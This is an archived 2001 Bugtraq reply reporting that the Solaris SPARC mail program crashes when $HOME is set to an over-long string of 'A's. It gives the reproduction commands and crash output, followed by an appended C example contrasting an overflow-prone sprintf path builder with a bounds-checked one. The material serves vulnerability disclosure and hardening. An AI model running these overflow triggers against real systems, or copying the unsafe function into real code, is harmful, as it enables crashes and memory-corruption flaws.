[20882] in bugtraq


Re: $HOME buffer overflow in SunOS 5.8 x86

daemon@ATHENA.MIT.EDU (SChoe)
Wed Jun 6 00:59:16 2001

Date: Tue, 5 Jun 2001 14:56:49 -1000 (HST)
From: SChoe <schoe@CheapTickets.COM>
To: <bugtraq@securityfocus.com>
Cc: <schoe@CheapTickets.COM>, <tdunlap@CheapTickets.COM>,
        <bhunter@CheapTickets.COM>, <ssakata@CheapTickets.COM>
Message-ID: <Pine.GSO.4.31.0106051442250.24707-100000@payt01.svl.corp.cheaptickets.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

> Solaris/sparc appears not to be vulnerable.

Solaris 2.6/2.7 SPARC are also susceptible
to the /usr/bin/mail buffer overflow.  Here are
the minimum buffers usable to produce
segmentation faults.

<---------------------snip--------------------->
SunOS <hostname> 5.6 Generic_105181-23 sun4u sparc
bash-2.04$ export HOME=`perl -e 'print "A"x1293'`
bash-2.04$ mail a
^C
mail: Cannot create dead.letter
mail: ERROR signal 11
mail: Cannot create dead.letter
mail: ERROR signal 11
mail: Cannot create dead.letter
mail: ERROR signal 11
(........)
Segmentation Fault
bash-2.04$
<---------------------snap--------------------->

<---------------------snip--------------------->
SunOS <hostname> 5.7 Generic_106541-12 sun4u sparc SUNW,Ultra-4

bash-2.04$ export HOME=`perl -e 'print "A"x1099'`
bash-2.04$ mail a
^C
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
(........)
Segmentation Fault
bash-2.04$
<---------------------snap--------------------->

+--------------------------------------------------+
| Sung J. Choe / UNIX Admin / www.CheapTickets.com |
|                                                  |
|       Ph: 808/945.7439   Fax: 808/946.5993       |
:--------------------------------------------------+
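
Added example, not part of the original post and not the Solaris mail source: the post does not show why mail crashes, so this assumes the bug class named in the subject line, a $HOME value copied into a fixed-size buffer while the dead.letter path is built. The 1024-byte buffer size and all function names are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF 1024               /* assumed fixed buffer size (illustration) */
#define DEAD_LETTER "/dead.letter"

/* Unsafe pattern (assumed): strlen(home) is never checked, so an over-long
 * $HOME writes past the end of `out`. Shown for contrast; never called here. */
void dead_letter_path_unsafe(const char *home, char out[PATH_BUF])
{
    sprintf(out, "%s%s", home, DEAD_LETTER);
}

/* Hardened form: refuse a missing, empty or over-long $HOME rather than
 * overflowing or silently truncating. Returns 0 on success, -1 on refusal. */
int dead_letter_path_safe(const char *home, char *out, size_t outsz)
{
    int n;

    if (home == NULL || home[0] == '\0')
        return -1;
    n = snprintf(out, outsz, "%s%s", home, DEAD_LETTER);
    if (n < 0 || (size_t)n >= outsz)
        return -1;                  /* result would not fit in the buffer */
    return 0;
}

/* Constructed input: a HOME made of `len` 'A' bytes, like the values in the
 * post. Returns what the hardened builder returns for it. */
int try_home_of_length(size_t len)
{
    char out[PATH_BUF];
    char *home = malloc(len + 1);
    int rc;

    if (home == NULL)
        return -1;
    memset(home, 'A', len);
    home[len] = '\0';
    rc = dead_letter_path_safe(home, out, sizeof out);
    free(home);
    return rc;
}

int main(void)
{
    printf("HOME of 1293 bytes: %d\n", try_home_of_length(1293));
    printf("HOME of 1099 bytes: %d\n", try_home_of_length(1099));
    return 0;
}
```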
